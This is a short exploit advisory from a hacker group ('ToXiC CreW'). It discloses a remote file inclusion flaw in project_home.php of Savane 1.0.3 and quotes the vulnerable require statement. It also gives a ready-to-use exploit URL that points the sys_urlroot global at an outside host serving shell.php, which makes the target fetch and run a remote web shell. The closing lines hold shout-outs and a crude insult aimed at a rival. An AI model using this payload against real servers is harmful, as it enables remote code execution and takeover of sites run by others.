Savane-1.0.3 suffers from a remote file inclusion vulnerability in project_home.php.
ca56745b36629cf0505d973c6f41f76ae84a2ccd135cdf0d1f845398707d1c07
###### ToXiC #########################
#
# Savane-1.0.3 Remote File Inclusion by ToXiC CreW
#
# ToXic Security Italian CreW
#
#
# BuG FounD by Drago84
#
# Application Affect:Savane 1.0.3
#
#Page:
# project_home.php
#Dir :
# /savane/frontend/php/include/
#
#Problem:
# require_directory("people");
# require_directory("news");
# require $GLOBALS['sys_urlroot']."/include/vars.php";
#
#ExPloit :
#
#http://www.site.com/savane/frontend/php/include/project_home.php?GLOB
ALS['sys_urlroot']=http://sonic-banda-di-lamer.gay/shell.php?
#
#
#GrEatZ All Member of ToXiC, Str0ke
#
#
#FUCK #Sonic
#
###### ToXiC ##########